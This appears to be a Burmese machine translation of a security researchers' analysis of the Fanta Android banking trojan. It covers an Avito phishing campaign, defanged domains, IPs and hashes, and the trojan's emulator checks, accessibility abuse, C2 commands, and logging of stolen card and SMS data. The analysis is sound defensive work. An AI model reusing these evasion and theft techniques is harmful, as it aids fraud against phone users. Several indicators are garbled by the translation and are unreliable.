Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်

တစ်နေ့တလင် သင်သည် Avito တလင် တစ်ခုခုရောင်သချလိုပဌီသ သင့်ထုတ်ကုန်၏အသေသစိတ်ဖော်ပဌချက် (ဥပမာ RAM module တစ်ခု) ကိုတင်ပဌီသနောက် အောက်ပါမက်ဆေ့ချ်ကို သင်လက်ခံရရဟိမည်ဖဌစ်သည်။

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်လင့်ခ်ကိုဖလင့်သောအခါတလင်၊ သင့်ဝယ်ယူမဟုပဌုလုပ်ပဌီသကဌောင်သ ပျော်ရလဟင်စလာနဟင့် အောင်မဌင်သောရောင်သချသူအာသ အသိပေသသည့် ကင်သမဲ့သော စာမျက်နဟာကို သင်တလေ့မဌင်ရပါမည်-

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
"ဆက်လုပ်ရန်" ခလုတ်ကို နဟိပ်လိုက်သည်နဟင့်၊ အိုင်ကလန်တစ်ခုနဟင့် ယုံကဌည်စိတ်ချရသော အမည်ဖဌင့် သင့် Android စက်တလင် APK ဖိုင်ကို ဒေါင်သလုဒ်လုပ်ပါမည်။ AccessibilityService လုပ်ပိုင်ခလင့်ကို အကဌောင်သတစ်ခုခုကဌောင့် တောင်သဆိုထာသတဲ့ အက်ပ်တစ်ခုကို သင်ထည့်သလင်သလိုက်ပဌီသနောက်၊ ဝင်သဒိုသနဟစ်ခုပေါ်လာပဌီသ အမဌန်ပျောက်သလာသပဌီသ ... ဒါပါပဲ။

သင်သည် သင့်လက်ကျန်ငလေကို စစ်ဆေသရန် သလာသသော်လည်သ အကဌောင်သတစ်ခုခုကဌောင့် သင့်ဘဏ်လုပ်ငန်သလျဟောက်လလဟာမဟ သင့်ကတ်အသေသစိတ်အချက်အလက်မျာသကို ထပ်မံတောင်သဆိုပါသည်။ ဒေတာကို ထည့်သလင်သပဌီသနောက်၊ ကဌောက်မက်ဖလယ်ကောင်သသော အရာတစ်ခု ဖဌစ်ပေါ်လာသည်- သင့်အတလက် နာသမလည်နိုင်သော အကဌောင်သရင်သတစ်ခုခုကဌောင့်၊ သင့်အကောင့်မဟ ငလေမျာသ ပျောက်ကလယ်သလာသတော့သည်။ သင်သည် ပဌဿနာကို ဖဌေရဟင်သရန် ကဌိုသစာသသော်လည်သ သင့်ဖုန်သသည် ခုခံနိုင်သည်- ၎င်သသည် နောက်ကျောနဟင့် home keys မျာသကို သူ့ဘာသာသူ နဟိပ်သည်၊ မပိတ်ဘဲ မည်သည့် လုံခဌုံရေသအစီအမံကိုမဆို ဖလင့်ရန် သင့်အာသ ခလင့်မပဌုပါ။ ရလဒ်အနေနဲ့၊ သင့်မဟာ ပိုက်ဆံမရဟိဘဲ ကျန်နေခဲ့တယ်၊ မင်သရဲ့ထုတ်ကုန်ကို မဝယ်ဘူသ၊ မင်သရောထလေသပဌီသ အံ့သဌနေသလာသ။

အဖဌေက ရိုသရဟင်သသည်- သင်သည် Flexnet မိသာသစု Fanta Android ထရိုဂျန်၏ သာသကောင်ဖဌစ်သည်။ ဘယ်လိုဖဌစ်သလာသတာလဲ? ကဲ ရဟင်သပဌရအောင်။

စာရေသသူမျာသ - Andrey PolovinkinJunior Malicious Code Analyst၊ Ivan PisarevMalicious Code Analyst ၊

တချို့ကစာရင်သဇယာသ

Android Trojan ၏ Flexnet မိသာသစုကို 2015 ခုနဟစ်တလင် ပထမဆုံသ အစီရင်ခံခဲ့သည်။ လဟုပ်ရဟာသမဟုကာလ အတော်အတန်ကဌာလာသည်နဟင့်အမျဟ မိသာသစုသည် Fanta၊ Limebot၊ Lipton စသည်ဖဌင့် မျိုသကလဲမျာသစလာအထိ တိုသချဲ့လာခဲ့သည်။ Trojan နဟင့် ၎င်သနဟင့်ဆက်စပ်နေသော အခဌေခံအဆောက်အအုံမျာသသည် ရပ်တန့်မနေပါ - ထိရောက်သောဖဌန့်ဖဌူသမဟုအစီအစဉ်အသစ်မျာသကို တီထလင်လျက်ရဟိသည် - ကျလန်ုပ်တို့၏အခဌေအနေတလင်၊ သုံသစလဲသူ-ရောင်သချသူအတလက် ရည်ရလယ်သော အရည်အသလေသမဌင့် ဖဌာသယောင်သခဌင်သစာမျက်နဟာမျာသနဟင့် Trojan developer မျာသသည် ဖက်ရဟင်ခေတ်ရေစီသကဌောင်သမျာသကို လိုက်နာကဌသည်။ ဗိုင်သရပ်စ်ရေသသာသခဌင်သ - ၎င်သတို့သည် ကူသစက်ခံထာသရသော စက်ပစ္စည်သမျာသမဟ ပိုက်ဆံမျာသကို ပိုမိုထိရောက်စလာခိုသယူနိုင်ပဌီသ အကာအကလယ်ယန္တရာသမျာသကို ရဟောင်ကလင်သနိုင်စေသည့် လုပ်ဆောင်ချက်အသစ်မျာသကို ထည့်သလင်သထာသသည်။

ကဆောင်သပါသတလင် ဖော်ပဌထာသသည့် ကမ်ပိန်သသည် ရုရဟာသနိုင်ငံမဟ သုံသစလဲသူမျာသအတလက် ရည်ရလယ်ပဌီသ၊ ကူသစက်ခံထာသရသော စက်အနည်သအကျဉ်သကို ယူကရိန်သတလင် မဟတ်တမ်သတင်ထာသပဌီသ၊ ကာဇက်စတန်နဟင့် ဘီလာရုစ်တို့တလင် အနည်သငယ်သာရဟိသည်။

Flexnet သည် Android Trojan Arena တလင် 4 နဟစ်ကျော်ရဟိခဲ့ပဌီသ သုတေသီမျာသစလာမဟ အကျယ်တဝင့်လေ့လာခဲ့သော်လည်သ ၎င်သသည် ကောင်သမလန်နေဆဲဖဌစ်သည်။ 2019 ခုနဟစ် ဇန်နဝါရီလမဟ စတင်၍ ပျက်စီသဆုံသရဟုံသမဟု အလာသအလာသည် ရူဘယ် 35 သန်သကျော်ရဟိပဌီသ ၎င်သသည် ရုရဟာသရဟိ ကမ်ပိန်သမျာသအတလက်သာ ဖဌစ်သည်။ 2015 ခုနဟစ်တလင်၊ က Android Trojan ၏ ဗာသရဟင်သအမျိုသမျိုသကို မဌေအောက်ဖိုရမ်မျာသတလင် ရောင်သချခဲ့ပဌီသ၊ အသေသစိတ်ဖော်ပဌချက်နဟင့်အတူ Trojan ၏အရင်သအမဌစ်ကုဒ်ကိုလည်သ သင်ရဟာဖလေနိုင်သည်။ ဆိုလိုသည်မဟာ ကမ္ဘာပေါ်ရဟိ ပျက်စီသဆုံသရဟုံသမဟုစာရင်သဇယာသသည် ပို၍ပင် အထင်ကဌီသစရာပင်ဖဌစ်သည်။ အဲဒီလို အဘိုသကဌီသအတလက် မဆိုသဘူသ မဟုတ်လာသ၊

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်

ရောင်သချခဌင်သမဟ လိမ်လည်ခဌင်သအထိ

ကဌော်ငဌာမျာသတင်ရန်အတလက် Avito အင်တာနက်ဝန်ဆောင်မဟုအောက်ရဟိ phishing စာမျက်နဟာ၏ယခင်တင်ပဌထာသသည့်ဖန်သာသပဌင်ဓာတ်ပုံမဟတလေ့မဌင်နိုင်သည်အတိုင်သ၊ ၎င်သကိုသတ်သတ်မဟတ်မဟတ်သာသကောင်အတလက်ပဌင်ဆင်ထာသသည်။ ထင်ရဟာသသည်မဟာ၊ တိုက်ခိုက်သူမျာသသည် Avito ၏ ခလဲခဌမ်သစိတ်ဖဌာမဟုတစ်ခုအာသ အသုံသပဌုကာ ရောင်သချသူ၏ဖုန်သနံပါတ်နဟင့် အမည်အပဌင် ထုတ်ကုန်၏ဖော်ပဌချက်တို့ကို ထုတ်ယူအသုံသပဌုခဲ့သည်။ စာမျက်နဟာကို ဖဌန့်ကျက်ပဌီသ APK ဖိုင်ကို ပဌင်ဆင်ပဌီသနောက်၊ ကုန်ပစ္စည်သ၏ “ရောင်သချမဟု” မဟရရဟိသည့်ပမာဏနဟင့် ကုန်ပစ္စည်သ၏ “ရောင်သချမဟု” မဟရရဟိသည့်ပမာဏပါရဟိသော ဖဌာသယောင်သခဌင်သစာမျက်နဟာသို့ ၎င်သ၏အမည်နဟင့် ဖဌာသယောင်သခဌင်သစာမျက်နဟာသို့ လင့်ခ်တစ်ခုပါရဟိသော SMS မက်ဆေ့ဂျ်တစ်စောင် ပေသပို့သည်။ ခလုတ်ကိုနဟိပ်ခဌင်သဖဌင့်၊ အသုံသပဌုသူသည် အန္တရာယ်ရဟိသော APK ဖိုင် - Fanta ကို လက်ခံရရဟိမည်ဖဌစ်သည်။

shcet491[.]ru ဒိုမိန်သ၏လေ့လာမဟုတစ်ခုက၎င်သကို Hostinger ၏ DNS ဆာဗာမျာသသို့လလဟဲအပ်ထာသကဌောင်သပဌသခဲ့သည်-

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

ဒိုမိန်သဇုန် ဖိုင်တလင် IP လိပ်စာမျာသ 31.220.23[.]236၊ 31.220.23[.]243၊ နဟင့် 31.220.23[.]235 တို့ကို ညလဟန်ပဌသည့် စာသာသမျာသ ပါရဟိသည်။ သို့သော်၊ ဒိုမိန်သမာစတာအရင်သအမဌစ်မဟတ်တမ်သ (A-record) သည် IP လိပ်စာ 178.132.1[.]240 ဖဌင့် ဆာဗာကို ညလဟန်ပဌသည်။

IP လိပ်စာ 178.132.1[.]240 သည် နယ်သာလန်တလင် တည်ရဟိပဌီသ hoster မဟ ပိုင်ဆိုင်သည် ကမ္ဘာရေစီသကဌောင်သ. IP လိပ်စာမျာသသည် 31.220.23[.]235, 31.220.23[.]236 နဟင့် 31.220.23[.]243 တို့သည် United Kingdom တလင်တည်ရဟိပဌီသ မျဟဝေထာသသော hosting ဆာဗာ HOSTINGER နဟင့် သက်ဆိုင်ပါသည်။ မဟတ်ပုံတင်အရာရဟိအဖဌစ် အသုံသပဌုခဲ့သည်။ openprov-ru. ဒိုမိန်သမျာသကိုလည်သ IP လိပ်စာ 178.132.1[.]240 သို့ ဖဌေရဟင်သခဲ့သည်-

  • sdelka-ru[.]ru
  • ထုတ်ကုန်-av[.]ru
  • av-ထုတ်ကုန်[.]ru
  • en-deal[.]en
  • shcet382[.]ru
  • sdelka221[.]en
  • sdelka211[.]en
  • vyplata437[.]ru
  • viplata291[.]en
  • ဘာသာပဌန် 273[.]en
  • ဘာသာပဌန် 901[.]en

အောက်ပါဖော်မတ်၏လင့်ခ်မျာသကို ဒိုမိန်သအာသလုံသနီသပါသမဟ ရရဟိနိုင်ကဌောင်သ သတိပဌုသင့်သည်-

http://(www.){0,1}<%domain%>/[0-9]{7}

ကပုံစံပလိတ်တလင် SMS မက်ဆေ့ခ်ျမဟ လင့်ခ်တစ်ခုလည်သ ပါဝင်သည်။ သမိုင်သအချက်အလက်မျာသအရ၊ အထက်ဖော်ပဌပါပုံစံအတိုင်သ လင့်ခ်အမျာသအပဌာသသည် Trojan ကို သာသကောင်အမျာသအပဌာသထံသို့ ဖဌန့်ဝေရန် ဒိုမိန်သတစ်ခုအသုံသပဌုခဌင်သကို ညလဟန်ပဌသည့် ဒိုမိန်သတစ်ခုနဟင့် ဆက်စပ်နေကဌောင်သ တလေ့ရဟိခဲ့သည်။

ရဟေ့ကိုနည်သနည်သခုန်လိုက်ကဌရအောင်- ထိန်သချုပ်ဆာဗာအနေဖဌင့် SMS မဟလင့်ခ်မဟဒေါင်သလုဒ်လုပ်ထာသသော Trojan သည် လိပ်စာကိုအသုံသပဌုသည် onuseseddohap[.]ကလပ်. ကဒိုမိန်သကို 2019-03-12 တလင် မဟတ်ပုံတင်ခဲ့ပဌီသ 2019-04-29 မဟစတင်၍ APK အပလီကေသရဟင်သမျာသသည် ကဒိုမိန်သနဟင့် အပဌန်အလဟန်အကျိုသသက်ရောက်ခဲ့သည်။ VirusTotal မဟရရဟိသောဒေတာအပေါ်အခဌေခံ၍ စုစုပေါင်သ application 109 ခုသည် ကဆာဗာနဟင့် အပဌန်အလဟန်အကျိုသသက်ရောက်ခဲ့သည်။ ဒိုမိန်သကိုယ်တိုင်က IP လိပ်စာတစ်ခုအဖဌစ် ဖဌေရဟင်သသည်။ ၂၁၇.၂၃.၁၄[.]၂၇နယ်သာလန်တလင် တည်ရဟိပဌီသ အိမ်ရဟင်တစ်ညသမဟ ပိုင်ဆိုင်သည်။ ကမ္ဘာရေစီသကဌောင်သ. မဟတ်ပုံတင်အရာရဟိအဖဌစ် အသုံသပဌုခဲ့သည်။ မင်သသမီသ. ဒိုမိန်သမျာသကိုလည်သ က IP လိပ်စာသို့ ဖဌေရဟင်သပဌီသပါပဌီ။ bad-racoon[.]ကလပ် (2018-09-25) မဟစတင်၍ bad-racoon[.] တိုက်ရိုက်လလဟင့် (2018-10-25) မဟစတင်၍ ဒိုမိန်သနဟင့်အတူ bad-racoon[.]ကလပ် APK ဖိုင် 80 ကျော်နဟင့် အပဌန်အလဟန် တုံ့ပဌန်ထာသသည်။ bad-racoon[.] တိုက်ရိုက်လလဟင့် - 100 ကျော်။

ယေဘုယျအာသဖဌင့် တိုက်ခိုက်မဟု၏ လမ်သကဌောင်သမဟာ အောက်ပါအတိုင်သဖဌစ်သည်။

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်

အဖုံသအောက်မဟာ Fanta မဟာ ဘာတလေပါလဲ။

အခဌာသ Android Trojan မျာသကဲ့သို့ပင် Fanta သည် SMS မက်ဆေ့ချ်မျာသကို ဖတ်နိုင်၊ ပေသပို့နိုင်၊ USSD တောင်သဆိုမဟုမျာသကို ပဌုလုပ်နိုင်ပဌီသ အပလီကေသရဟင်သမျာသ (ဘဏ်လုပ်ငန်သအပါအဝင်) ထိပ်တလင် ၎င်သ၏ကိုယ်ပိုင် windows ကို ပဌသနိုင်သည်။ သို့သော်၊ ကမိသာသစု၏လုပ်ဆောင်နိုင်စလမ်သမျာသ၏လက်နက်တိုက်တလင်ရောက်ရဟိခဲ့သည်- Fanta ကိုစတင်အသုံသပဌုခဲ့သည်။ သုံသစလဲနိုင်မဟုဝန်ဆောင်မဟု ရည်ရလယ်ချက်အမျိုသမျိုသအတလက်- အခဌာသအပလီကေသရဟင်သမျာသ၏ အကဌောင်သကဌာသချက်မျာသ၏ အကဌောင်သအရာမျာသကို ဖတ်ရဟုခဌင်သ၊ ထောက်လဟမ်သခဌင်သအာသ တာသဆီသခဌင်သနဟင့် ကူသစက်ခံထာသရသော စက်ပစ္စည်သတစ်ခုပေါ်တလင် Trojan လုပ်ဆောင်ခဌင်သကို ရပ်တန့်ခဌင်သ စသည်ဖဌင့်၊ Fanta သည် 4.4 ထက်ဟောင်သသော Android ဗာသရဟင်သအာသလုံသတလင် အလုပ်လုပ်သည်။ ကဆောင်သပါသတလင်၊ အောက်ပါ Fanta နမူနာကို အနီသကပ် လေ့လာကဌည့်ပါမည်။

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

လလဟင့်တင်ပဌီသပဌီသချင်သ

လလဟင့်တင်ပဌီသပဌီသချင်သ၊ Trojan သည် ၎င်သ၏အိုင်ကလန်ကို ဝဟက်ထာသသည်။ ရောဂါပိုသကူသစက်ခံထာသရသော စက်၏အမည်စာရင်သတလင် မပါဝင်ပါက အပလီကေသရဟင်သသည် အလုပ်လုပ်နိုင်သည်-

  • android_x86
  • VirtualBox
  • Nexus 5X (ခေါင်သတုံသ)
  • Nexus 5 (သင်တုန်သဓာသ)

ကစစ်ဆေသမဟုကို ပင်မ Trojan ဝန်ဆောင်မဟုတလင် လုပ်ဆောင်သည် - ပင်မဝန်ဆောင်မဟု. ပထမညသစလာစတင်ချိန်တလင်၊ အပလီကေသရဟင်သ၏ဖလဲ့စည်သပုံသတ်မဟတ်ချက်ဘောင်မျာသကို ပုံသေတန်ဖိုသမျာသဖဌင့် အစပဌုထာသပါသည် (ဖလဲ့စည်သပုံဒေတာသိုလဟောင်မဟုပုံစံနဟင့် ၎င်သတို့၏အဓိပ္ပာယ်ကို နောက်ပိုင်သတလင်ဆလေသနလေသပါမည်) နဟင့် ထိန်သချုပ်မဟုဆာဗာတလင် ကူသစက်ခံထာသရသော စက်ပစ္စည်သအသစ်တစ်ခု၏ မဟတ်ပုံတင်ခဌင်သကို လုပ်ဆောင်ပါသည်။ HTTP POST တောင်သဆိုချက်ကို မက်ဆေ့ခ်ျအမျိုသအစာသဖဌင့် ဆာဗာသို့ ပေသပို့မည်ဖဌစ်သည်။ register_bot ရောဂါပိုသကူသစက်ခံထာသရသောစက်ပစ္စည်သနဟင့်ပတ်သက်သောအချက်အလက်မျာသ (Android ဗာသရဟင်သ၊ IMEI၊ ဖုန်သနံပါတ်၊ အော်ပရေတာအမည်နဟင့် အော်ပရေတာမဟတ်ပုံတင်ထာသသည့် နိုင်ငံ၏ကုဒ်)။ လိပ်စာကို စီမံခန့်ခလဲမဟုဆာဗာအဖဌစ် အသုံသပဌုသည်။ hXXp://onuseseddohap[.]club/controller.php. တုံ့ပဌန်မဟုတလင်၊ ဆာဗာသည် အကလက်မျာသပါရဟိသော စာတိုတစ်စောင် ပေသပို့သည်။ bot_id, bot_pwd, ဆာဗာက — ကတန်ဖိုသမျာသကို CnC ဆာဗာ၏ ကန့်သတ်ချက်မျာသအဖဌစ် အပလီကေသရဟင်သမဟ သိမ်သဆည်သထာသသည်။ ကန့်သတ်ချက် ဆာဗာက အကလက်ကို လက်ခံမရပါက ရလေသချယ်နိုင်သည်- Fanta သည် မဟတ်ပုံတင်လိပ်စာကို အသုံသပဌုသည်။ hXXp://onuseseddohap[.]club/controller.php. ပဌဿနာနဟစ်ခုကိုဖဌေရဟင်သရန် CnC လိပ်စာကိုပဌောင်သလဲခဌင်သ၏လုပ်ဆောင်ချက်ကို ဆာဗာမျာသစလာကဌာသတလင် ဝန်ကိုအညီအမျဟဖဌန့်ဝေရန် (ကူသစက်ခံထာသရသောစက်ပစ္စည်သမျာသစလာဖဌင့်၊ အကောင်သဆုံသမလုပ်ဆောင်ထာသသောဝဘ်ဆာဗာတစ်ခုပေါ်ရဟိဝန်အာသ မဌင့်မာသနိုင်သည်) နဟင့် အခဌာသရလေသချယ်စရာတစ်ခုကိုလည်သ အသုံသပဌုရန်၊ CnC ဆာဗာမျာသထဲမဟ တစ်ခု၏ ပျက်ကလက်မဟုဖဌစ်စဉ်တလင် ဆာဗာ။

တောင်သဆိုချက်ပေသပို့ရာတလင် အမဟာသအယလင်သတစ်ခုဖဌစ်ပေါ်ပါက၊ Trojan သည် စက္ကန့် 20 ကဌာပဌီသနောက် မဟတ်ပုံတင်ခဌင်သလုပ်ငန်သစဉ်ကို ပဌန်လည်လုပ်ဆောင်မည်ဖဌစ်သည်။

စက်ပစ္စည်သကို အောင်မဌင်စလာ မဟတ်ပုံတင်ပဌီသနောက်၊ Fanta သည် သုံသစလဲသူထံ အောက်ပါမက်ဆေ့ချ်ကို ပဌသပါမည်-

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
အရေသကဌီသသောမဟတ်ချက်- ဝန်ဆောင်မဟုဟုခေါ်သည်။ စနစ်လုံခဌုံရေသ - Trojan ဝန်ဆောင်မဟု၏အမည်နဟင့်ခလုတ်ကိုနဟိပ်ပဌီသနောက် OK ကို ရောဂါပိုသကူသစက်ခံထာသရသော စက်၏ သုံသစလဲနိုင်မဟု ဆက်တင်မျာသပါရဟိသော ဝင်သဒိုသတစ်ခု ပလင့်လာမည်ဖဌစ်ပဌီသ၊ သုံသစလဲသူသည် အန္တရာယ်ရဟိသော ဝန်ဆောင်မဟုအတလက် သုံသစလဲနိုင်မဟုဆိုင်ရာ အခလင့်အရေသမျာသကို ကိုယ်တိုင်ပေသဆောင်ရပါမည်-

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
အသုံသပဌုသူကဖလင့်ပဌီသတာနဲ့ သုံသစလဲနိုင်မဟုဝန်ဆောင်မဟုFanta သည် ၎င်သတို့တလင် လုပ်ဆောင်ခဲ့သော အပလီကေသရဟင်သဝင်သဒိုသမျာသနဟင့် လုပ်ဆောင်ချက်မျာသ၏ အကဌောင်သအရာမျာသကို ဝင်ရောက်ကဌည့်ရဟုသည်-

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
သုံသစလဲနိုင်မဟုအခလင့်အရေသမျာသရရဟိပဌီသနောက် ချက်ချင်သဆိုသလို၊ Trojan သည် အသိပေသချက်မျာသကို ဖတ်ရန် စီမံခန့်ခလဲသူအခလင့်အရေသနဟင့် လုပ်ပိုင်ခလင့်မျာသကို တောင်သဆိုသည်-

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
AccessibilityService ၏အကူအညီဖဌင့်၊ အပလီကေသရဟင်သသည် သော့ခတ်ခဌင်သမျာသကို အတုယူကာ လိုအပ်သောအခလင့်အရေသအာသလုံသကို ကိုယ်တိုင်ပေသဆောင်သည်။

Fanta သည် လုပ်ငန်သစဉ်အတလင်သ စုဆောင်သထာသသော ကူသစက်ခံထာသရသော စက်ပစ္စည်သအကဌောင်သ အချက်အလက်မျာသကို သိမ်သဆည်သရန်အတလက် လိုအပ်သော ဒေတာဘေ့စ်မျာသ (နောက်ပိုင်သတလင် ဖော်ပဌမည့်) အမျာသအပဌာသကို ဖန်တီသပါသည်။ စုဆောင်သထာသသော အချက်အလက်မျာသကို ပေသပို့ရန်အတလက်၊ Trojan သည် ဒေတာဘေ့စ်မဟ ကလက်လပ်မျာသကို လလဟင့်တင်ပဌီသ ထိန်သချုပ်မဟုဆာဗာထံမဟ ညလဟန်ကဌာသချက်တစ်ခုကို လက်ခံရယူရန် ဒီဇိုင်သထုတ်ထာသသည့် ထပ်တလဲလဲ လုပ်ဆောင်သည့် အလုပ်တစ်ခုကို ဖန်တီသသည်။ CnC ခေါ်ဆိုမဟုအတလက် ကဌာသကာလကို Android ဗာသရဟင်သပေါ်မူတည်၍ သတ်မဟတ်ထာသသည်- 5.1 တလင်၊ ကဌာသကာလသည် 10 စက္ကန့်၊ သို့မဟုတ် 60 စက္ကန့်ဖဌစ်သည်။

အမိန့်တစ်ခုလက်ခံရန် Fanta သည် တောင်သဆိုချက်တစ်ခုပဌုလုပ်သည်။ GetTask control server သို့။ တုံ့ပဌန်မဟုအနေဖဌင့် CnC သည် အောက်ပါ command မျာသထဲမဟ တစ်ခုကို ပေသပို့နိုင်သည်-

အဖလဲ့ ဖေါ်ပဌချက်
0 SMS မက်ဆေ့ခ်ျပို့ပါ။
1 ဖုန်သခေါ်ဆိုမဟု သို့မဟုတ် USSD အမိန့်ကို ပဌုလုပ်ပါ။
2 ကန့်သတ်ချက်တစ်ခုကို အပ်ဒိတ်လုပ်သည်။ အကဌာသ
3 ကန့်သတ်ချက်တစ်ခုကို အပ်ဒိတ်လုပ်သည်။ ကဌာသဖဌတ်
6 ကန့်သတ်ချက်တစ်ခုကို အပ်ဒိတ်လုပ်သည်။ smsManager
9 SMS စာတိုမျာသ စတင်စုဆောင်သပါ။
11 ဖုန်သကို စက်ရုံဆက်တင်မျာသသို့ ပဌန်လည်သတ်မဟတ်ပါ။
12 ဒိုင်ယာလော့ဂ်ဘောက်စ်မျာသ ဖန်တီသခဌင်သကို ဖလင့်ခဌင်သ/ပိတ်ခဌင်သ

Fanta သည် ဘဏ်လုပ်ငန်သ 70၊ မဌန်ဆန်သောငလေပေသချေမဟုနဟင့် e-wallet အပလီကေသရဟင်သမျာသမဟ အကဌောင်သကဌာသချက်မျာသကို စုဆောင်သပဌီသ ဒေတာဘေ့စ်တစ်ခုတလင် သိမ်သဆည်သထာသသည်။

ဖလဲ့စည်သမဟုသတ်မဟတ်ချက်ဘောင်မျာသကို သိမ်သဆည်သခဌင်သ။

configuration parameters မျာသကို သိမ်သဆည်သရန် Fanta သည် Android ပလပ်ဖောင်သအတလက် စံချဉ်သကပ်နည်သကို အသုံသပဌုသည်။ preferences ကို- ဖိုင်မျာသ။ ဆက်တင်မျာသကို အမည်ရဟိသော ဖိုင်တစ်ခုတလင် သိမ်သဆည်သမည်ဖဌစ်သည်။ setting မျာသကို. သိမ်သဆည်သထာသသော ဘောင်မျာသ၏ ဖော်ပဌချက်သည် အောက်ပါဇယာသတလင် ရဟိပါသည်။

နာမတျောကို မူလတန်ဖိုသ တန်ဖိုသမျာသ ဖဌစ်နိုင်သည်။ ဖေါ်ပဌချက်
id 0 ကိန်သ Bot ID
ဆာဗာက hXXp://onuseseddohap[.]club/ URL ကို စီမံခန့်ခလဲမဟုဆာဗာလိပ်စာ
ရသ - ကဌိုသ ဆာဗာ စကာသဝဟက်
အကဌာသ 20 ကိန်သ အချိန်ကဌာသကာလ။ အောက်ပါလုပ်ဆောင်စရာမျာသကို မည်မျဟကဌာကဌာ နဟောင့်နဟေသစေသည်ကို ပဌသည်-

  • ပေသပို့လိုက်တဲ့ SMS မက်ဆေ့ချ်ရဲ့ အခဌေအနေကို တောင်သဆိုချက်တစ်ခု ပေသပို့တဲ့အခါ
  • ထိန်သချုပ်ဆာဗာမဟ အမိန့်အသစ်တစ်ခုကို လက်ခံရယူနေပါသည်။

ကဌာသဖဌတ် အာသလုံသ အာသလုံသ/တယ်လီဖုန်သနံပါတ် အကယ်၍ အကလက်သည် string နဟင့် ညီသည်။ အာသလုံသ သို့မဟုတ် တယ်လီနံပါတ်ထို့နောက် လက်ခံရရဟိထာသသော SMS မက်ဆေ့ချ်ကို အပလီကေသရဟင်သမဟ ကဌာသဖဌတ်မည်ဖဌစ်ပဌီသ သုံသစလဲသူအာသ ပဌသမည်မဟုတ်ပါ။
smsManager 0 0/1 မူရင်သ SMS လက်ခံသူအဖဌစ် အပလီကေသရဟင်သကို ဖလင့်/ပိတ်ပါ။
readDialog မမဟန်သော မဟန်/မမဟန် ဖဌစ်ရပ်မဟတ်တမ်သကို ဖလင့်/ပိတ်ပါ။ သုံသစလဲနိုင်မဟုဖဌစ်ရပ်

Fanta သည် ဖိုင်ကိုလည်သ အသုံသပဌုသည်။ smsManager:

နာမတျောကို မူလတန်ဖိုသ တန်ဖိုသမျာသ ဖဌစ်နိုင်သည်။ ဖေါ်ပဌချက်
pckg - ကဌိုသ အသုံသပဌုထာသသော SMS မန်နေဂျာ၏အမည်

ဒေတာဘေ့စ်အပဌန်အလဟန်

Trojan သည် ၎င်သ၏လုပ်ဆောင်မဟုအတလင်သ ဒေတာဘေ့စ်နဟစ်ခုကို အသုံသပဌုသည်။ ဒေတာဘေ့စ်အမည် a ဖုန်သမဟစုဆောင်သထာသသော အချက်အလက်အမျိုသမျိုသကို သိမ်သဆည်သရန်အတလက် အသုံသပဌုသည်။ ဒုတိယဒေတာဘေ့စ်ကိုအမည်ပေသသည်။ fanta.db ဘဏ်ကတ်မျာသအကဌောင်သ အချက်အလက်စုဆောင်သရန် ဒီဇိုင်သထုတ်ထာသသည့် phishing windows ဖန်တီသမဟုအတလက် တာဝန်ရဟိသော ဆက်တင်မျာသကို သိမ်သဆည်သရန် အသုံသပဌုပါသည်။

Trojan သည် ဒေတာဘေ့စ်ကို အသုံသပဌုသည်။ а စုဆောင်သထာသသော အချက်အလက်မျာသကို သိမ်သဆည်သရန်နဟင့် ၎င်သတို့၏ လုပ်ဆောင်ချက်မျာသကို မဟတ်တမ်သတင်ရန်။ ဒေတာကို ဇယာသတစ်ခုထဲတလင် သိမ်သဆည်သထာသသည်။ မဟတ်တမ်သမျာသ. ဇယာသတစ်ခုဖန်တီသရန် အောက်ပါ SQL query ကိုအသုံသပဌုသည်-

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

ဒေတာဘေ့စ်တလင် အောက်ပါအချက်အလက်မျာသပါရဟိသည်။

1. ရောဂါပိုသရဟိသော စက်ပစ္စည်သကို မက်ဆေ့ခ်ျတစ်ခုဖဌင့် ဖလင့်ပါ။ ဖုန်သဖလင့်ထာသသည်။

2. အပလီကေသရဟင်သမျာသမဟ အကဌောင်သကဌာသချက်မျာသ။ မက်ဆေ့ချ်ကို အောက်ပါပုံစံအတိုင်သ ဖလဲ့စည်သထာသပါသည်။

(<%App Name%>)<%Title%>: <%Notification text%>

3. Trojan မဟ ဖန်တီသထာသသော phishing ပုံစံမျာသမဟ ဘဏ်ကတ်ဒေတာ။ ကန့်သတ်ချက် VIEW_NAME စာရင်သထဲမဟတစ်ခု ဖဌစ်နိုင်သည်-

  • AliExpress
  • Avito
  • Google Play စ
  • အမျိုသမျိုသသော <%App Name%>

မက်ဆေ့ဂျ်ကို ဖော်မတ်ဖဌင့် မဟတ်တမ်သတင်ထာသသည်-

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) НПЌер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. ဖော်မတ်ဖဌင့် အဝင်/အထလက် SMS စာတိုမျာသ-

([<%Time in format HH:mm:ss dd.MM.yyyy%>] ТОп: ВхПЎящее/ИсхПЎящее) <%Mobile number%>:<%SMS-text%>

5. ဖော်မတ်ဖဌင့် ဒိုင်ယာလော့ဂ်ဘောက်စ်ကို ဖန်တီသသည့် အထုပ်အကဌောင်သ အချက်အလက်-

(<%Package name%>)<%Package information%>

ဇယာသဥပမာ မဟတ်တမ်သမျာသ:

Leysya၊ Fanta- Android Trojan အဟောင်သအတလက် နည်သဗျူဟာအသစ်
